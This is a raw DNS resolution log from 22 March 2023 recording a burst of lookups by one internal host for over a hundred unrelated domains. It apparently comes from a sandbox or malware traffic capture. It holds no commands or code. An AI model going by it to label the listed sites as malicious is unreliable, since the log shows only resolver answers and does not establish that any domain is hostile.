Mar 22, 2023 05:45:39.736031055 CET	8.8.8.8	192.168.2.5	0x6ac7	No error (0)	sledsport.ru		185.22.232.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.776210070 CET	8.8.8.8	192.168.2.5	0x74fc	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.825790882 CET	8.8.8.8	192.168.2.5	0x77a4	No error (0)	wnit.org		38.111.255.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.920089006 CET	8.8.8.8	192.168.2.5	0x7898	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.920089006 CET	8.8.8.8	192.168.2.5	0x7898	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.920089006 CET	8.8.8.8	192.168.2.5	0x7898	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.940285921 CET	8.8.8.8	192.168.2.5	0x28fd	No error (0)	nrsi.com		76.223.35.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.984596968 CET	8.8.8.8	192.168.2.5	0x201a	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.043312073 CET	8.8.8.8	192.168.2.5	0xe8d5	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.043360949 CET	8.8.8.8	192.168.2.5	0xd7ed	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.043360949 CET	8.8.8.8	192.168.2.5	0xd7ed	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.043360949 CET	8.8.8.8	192.168.2.5	0xd7ed	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.104598999 CET	8.8.8.8	192.168.2.5	0x6549	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.125236988 CET	8.8.8.8	192.168.2.5	0x1c59	No error (0)	uhsa.edu.ag		192.124.249.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.204365015 CET	8.8.8.8	192.168.2.5	0x2755	No error (0)	midap.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.204365015 CET	8.8.8.8	192.168.2.5	0x2755	No error (0)	midap.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.204365015 CET	8.8.8.8	192.168.2.5	0x2755	No error (0)	midap.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.204365015 CET	8.8.8.8	192.168.2.5	0x2755	No error (0)	midap.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.210123062 CET	8.8.8.8	192.168.2.5	0x9470	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.230495930 CET	8.8.8.8	192.168.2.5	0xac56	No error (0)	bossinst.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.251712084 CET	8.8.8.8	192.168.2.5	0xa27	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.281702995 CET	8.8.8.8	192.168.2.5	0xfc30	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.283241034 CET	8.8.8.8	192.168.2.5	0x8c5	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.309775114 CET	8.8.8.8	192.168.2.5	0xd7f4	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.330312014 CET	8.8.8.8	192.168.2.5	0x6892	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.341161966 CET	8.8.8.8	192.168.2.5	0x6860	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.368629932 CET	8.8.8.8	192.168.2.5	0x9746	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.381146908 CET	8.8.8.8	192.168.2.5	0x78d3	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.411026001 CET	8.8.8.8	192.168.2.5	0xcc56	No error (0)	agulatex.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.581576109 CET	8.8.8.8	192.168.2.5	0x1164	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.679100037 CET	8.8.8.8	192.168.2.5	0x62f4	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.743717909 CET	8.8.8.8	192.168.2.5	0x890	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.800843954 CET	8.8.8.8	192.168.2.5	0xa386	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.809957027 CET	8.8.8.8	192.168.2.5	0xd2f7	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.828028917 CET	8.8.8.8	192.168.2.5	0xf7eb	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.873770952 CET	8.8.8.8	192.168.2.5	0x79d3	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.964365959 CET	8.8.8.8	192.168.2.5	0x2a4d	No error (0)	a-domani.com		183.90.232.24	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.990688086 CET	8.8.8.8	192.168.2.5	0x1b58	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.008539915 CET	8.8.8.8	192.168.2.5	0xc009	No error (0)	kursavto.ru		31.177.80.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.008539915 CET	8.8.8.8	192.168.2.5	0xc009	No error (0)	kursavto.ru		31.177.76.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.058945894 CET	8.8.8.8	192.168.2.5	0xd327	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.087598085 CET	8.8.8.8	192.168.2.5	0x3d9f	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.157037973 CET	8.8.8.8	192.168.2.5	0x4b66	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.190234900 CET	8.8.8.8	192.168.2.5	0x96b	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.220489979 CET	8.8.8.8	192.168.2.5	0x5fad	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.273212910 CET	8.8.8.8	192.168.2.5	0xfc30	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.275408983 CET	8.8.8.8	192.168.2.5	0x1acc	No error (0)	amerifor.com		64.18.191.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.322284937 CET	8.8.8.8	192.168.2.5	0x8f7b	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.364012003 CET	8.8.8.8	192.168.2.5	0x9746	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.390964031 CET	8.8.8.8	192.168.2.5	0x1691	No error (0)	sjbmw.com		198.199.101.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.533427954 CET	8.8.8.8	192.168.2.5	0x78d3	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.623780012 CET	8.8.8.8	192.168.2.5	0x1164	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.685956955 CET	8.8.8.8	192.168.2.5	0x90b2	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.685956955 CET	8.8.8.8	192.168.2.5	0x90b2	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.817922115 CET	8.8.8.8	192.168.2.5	0xa5de	No error (0)	yasuma.com		61.200.81.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.830082893 CET	8.8.8.8	192.168.2.5	0x1853	No error (0)	vivastay.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:41.830082893 CET	8.8.8.8	192.168.2.5	0x1853	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:41.830082893 CET	8.8.8.8	192.168.2.5	0x1853	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.830082893 CET	8.8.8.8	192.168.2.5	0x1853	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.990881920 CET	8.8.8.8	192.168.2.5	0x413d	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.026200056 CET	8.8.8.8	192.168.2.5	0xfb4f	No error (0)	snf.it		95.174.22.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.297435999 CET	8.8.8.8	192.168.2.5	0xfc30	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.311683893 CET	8.8.8.8	192.168.2.5	0x8f7b	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.367381096 CET	8.8.8.8	192.168.2.5	0x9746	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.454775095 CET	8.8.8.8	192.168.2.5	0xbe55	No error (0)	gphpedit.org		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.606095076 CET	8.8.8.8	192.168.2.5	0xca03	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.606231928 CET	8.8.8.8	192.168.2.5	0x1164	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.158847094 CET	8.8.8.8	192.168.2.5	0xd051	No error (0)	yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.230967045 CET	8.8.8.8	192.168.2.5	0x524e	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.251123905 CET	8.8.8.8	192.168.2.5	0x51a3	No error (0)	univi.it		18.197.121.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.333851099 CET	8.8.8.8	192.168.2.5	0x8f7b	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.370835066 CET	8.8.8.8	192.168.2.5	0x5d47	No error (0)	mail.airmail.net		66.226.70.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.578731060 CET	8.8.8.8	192.168.2.5	0x7bdf	No error (0)	skgm.ru		91.201.52.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.796142101 CET	8.8.8.8	192.168.2.5	0xb9e6	No error (0)	skypearl.com		153.122.170.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.849282026 CET	8.8.8.8	192.168.2.5	0x2f95	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.870887995 CET	8.8.8.8	192.168.2.5	0xf1c5	No error (0)	mail.airmail.net		66.226.70.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.288615942 CET	8.8.8.8	192.168.2.5	0xfc30	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.368601084 CET	8.8.8.8	192.168.2.5	0x9746	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.390595913 CET	8.8.8.8	192.168.2.5	0x5b36	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.466018915 CET	8.8.8.8	192.168.2.5	0x53ce	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.466018915 CET	8.8.8.8	192.168.2.5	0x53ce	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.600984097 CET	8.8.8.8	192.168.2.5	0x1164	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.718847990 CET	8.8.8.8	192.168.2.5	0x42dd	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.718847990 CET	8.8.8.8	192.168.2.5	0x42dd	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.825046062 CET	8.8.8.8	192.168.2.5	0xa6fa	No error (0)	hubbikes.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.825046062 CET	8.8.8.8	192.168.2.5	0xa6fa	No error (0)	hubbikes.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.969497919 CET	8.8.8.8	192.168.2.5	0xbae3	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.319288969 CET	8.8.8.8	192.168.2.5	0xdeeb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.395523071 CET	8.8.8.8	192.168.2.5	0x2b83	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.495683908 CET	8.8.8.8	192.168.2.5	0x645e	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.610840082 CET	8.8.8.8	192.168.2.5	0x1cb0	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.621970892 CET	8.8.8.8	192.168.2.5	0xaa8b	No error (0)	nettle.pl		195.128.140.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.749286890 CET	8.8.8.8	192.168.2.5	0xe33	No error (0)	okashimo.com		203.137.75.45	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.889919043 CET	8.8.8.8	192.168.2.5	0x6a37	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.302072048 CET	8.8.8.8	192.168.2.5	0xdeeb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.397507906 CET	8.8.8.8	192.168.2.5	0x2b83	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.638756990 CET	8.8.8.8	192.168.2.5	0x7d0e	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.638756990 CET	8.8.8.8	192.168.2.5	0x7d0e	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.713794947 CET	8.8.8.8	192.168.2.5	0x6d79	No error (0)	alexpope.biz		76.74.184.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.715115070 CET	8.8.8.8	192.168.2.5	0x9802	No error (0)	dspears.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:46.715115070 CET	8.8.8.8	192.168.2.5	0x9802	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:46.715115070 CET	8.8.8.8	192.168.2.5	0x9802	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.715115070 CET	8.8.8.8	192.168.2.5	0x9802	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.734210014 CET	8.8.8.8	192.168.2.5	0xad05	No error (0)	xinhui.net		43.255.29.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.302788019 CET	8.8.8.8	192.168.2.5	0xdeeb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.373410940 CET	8.8.8.8	192.168.2.5	0x9431	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.411216021 CET	8.8.8.8	192.168.2.5	0x2b83	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.575010061 CET	8.8.8.8	192.168.2.5	0x2e49	No error (0)	cutchie.com		199.59.243.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.615233898 CET	8.8.8.8	192.168.2.5	0x1cb0	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.766923904 CET	8.8.8.8	192.168.2.5	0x778c	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.186292887 CET	8.8.8.8	192.168.2.5	0xa7c9	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.490472078 CET	8.8.8.8	192.168.2.5	0x5183	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.524430037 CET	8.8.8.8	192.168.2.5	0x4aab	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.562520027 CET	8.8.8.8	192.168.2.5	0x5833	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.734312057 CET	8.8.8.8	192.168.2.5	0x6fad	No error (0)	rkengg.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:48.734312057 CET	8.8.8.8	192.168.2.5	0x6fad	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:48.734312057 CET	8.8.8.8	192.168.2.5	0x6fad	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.734312057 CET	8.8.8.8	192.168.2.5	0x6fad	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.737760067 CET	8.8.8.8	192.168.2.5	0x973c	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.047708988 CET	8.8.8.8	192.168.2.5	0xec1c	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.318849087 CET	8.8.8.8	192.168.2.5	0xdeeb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.411477089 CET	8.8.8.8	192.168.2.5	0x2b83	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.493320942 CET	8.8.8.8	192.168.2.5	0xb79d	No error (0)	mail.airmail.net		66.226.70.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.629565001 CET	8.8.8.8	192.168.2.5	0x1cb0	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.832215071 CET	8.8.8.8	192.168.2.5	0xd528	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.832215071 CET	8.8.8.8	192.168.2.5	0xd528	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.840384960 CET	8.8.8.8	192.168.2.5	0x3f15	No error (0)	thiessen.net		62.75.251.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:50.097460032 CET	8.8.8.8	192.168.2.5	0x94ce	No error (0)	kavram.com		104.21.89.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:50.097460032 CET	8.8.8.8	192.168.2.5	0x94ce	No error (0)	kavram.com		172.67.189.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:50.346507072 CET	8.8.8.8	192.168.2.5	0x58cf	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:50.424035072 CET	8.8.8.8	192.168.2.5	0x552	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:50.634388924 CET	8.8.8.8	192.168.2.5	0xc992	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.352787018 CET	8.8.8.8	192.168.2.5	0x58cf	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.429771900 CET	8.8.8.8	192.168.2.5	0x552	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.583837986 CET	8.8.8.8	192.168.2.5	0xc3c1	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.583837986 CET	8.8.8.8	192.168.2.5	0xc3c1	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.592238903 CET	8.8.8.8	192.168.2.5	0xf3bb	No error (0)	camamat.com		104.21.235.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.592238903 CET	8.8.8.8	192.168.2.5	0xf3bb	No error (0)	camamat.com		104.21.235.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.594161034 CET	8.8.8.8	192.168.2.5	0x94c7	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.631206036 CET	8.8.8.8	192.168.2.5	0xc992	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.785491943 CET	8.8.8.8	192.168.2.5	0xa006	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.810934067 CET	8.8.8.8	192.168.2.5	0x4462	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.842683077 CET	8.8.8.8	192.168.2.5	0x7fa0	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.999042988 CET	8.8.8.8	192.168.2.5	0x24d0	No error (0)	t-mould.com		81.169.145.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.232379913 CET	8.8.8.8	192.168.2.5	0x379c	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.374439955 CET	8.8.8.8	192.168.2.5	0x58cf	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.397334099 CET	8.8.8.8	192.168.2.5	0x132c	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.437350035 CET	8.8.8.8	192.168.2.5	0x552	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.532152891 CET	8.8.8.8	192.168.2.5	0xc392	No error (0)	vivastay.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:52.532152891 CET	8.8.8.8	192.168.2.5	0xc392	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:52.532152891 CET	8.8.8.8	192.168.2.5	0xc392	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.532152891 CET	8.8.8.8	192.168.2.5	0xc392	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.633220911 CET	8.8.8.8	192.168.2.5	0xc992	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.695827961 CET	8.8.8.8	192.168.2.5	0x8116	No error (0)	vdoherty.com		91.216.241.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.843144894 CET	8.8.8.8	192.168.2.5	0x288e	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.902364016 CET	8.8.8.8	192.168.2.5	0x5c49	No error (0)	aba.org.eg		192.169.149.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.279067039 CET	8.8.8.8	192.168.2.5	0x6ce1	No error (0)	gphpedit.org		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.291845083 CET	8.8.8.8	192.168.2.5	0xcb2d	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.293859005 CET	8.8.8.8	192.168.2.5	0x5de8	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.409423113 CET	8.8.8.8	192.168.2.5	0x373e	No error (0)	reproar.com		194.143.194.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.192941904 CET	8.8.8.8	192.168.2.5	0xa666	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.384373903 CET	8.8.8.8	192.168.2.5	0x58cf	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.428339005 CET	8.8.8.8	192.168.2.5	0xed4	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.820132017 CET	8.8.8.8	192.168.2.5	0xc992	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.820624113 CET	8.8.8.8	192.168.2.5	0x552	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.389826059 CET	8.8.8.8	192.168.2.5	0x6b9c	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.390969992 CET	8.8.8.8	192.168.2.5	0x3919	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.391406059 CET	8.8.8.8	192.168.2.5	0x6df9	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.391932011 CET	8.8.8.8	192.168.2.5	0x8a86	No error (0)	floopis.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.410475969 CET	8.8.8.8	192.168.2.5	0x73d4	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.410475969 CET	8.8.8.8	192.168.2.5	0x73d4	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.412214041 CET	8.8.8.8	192.168.2.5	0x3794	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.412240982 CET	8.8.8.8	192.168.2.5	0x6096	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.412329912 CET	8.8.8.8	192.168.2.5	0xb53d	No error (0)	pcoyuncu.com		213.142.131.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.414115906 CET	8.8.8.8	192.168.2.5	0x64fd	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.417120934 CET	8.8.8.8	192.168.2.5	0x9071	No error (0)	hbfuels.com		85.233.160.148	A (IP address)	IN (0x0001)	false
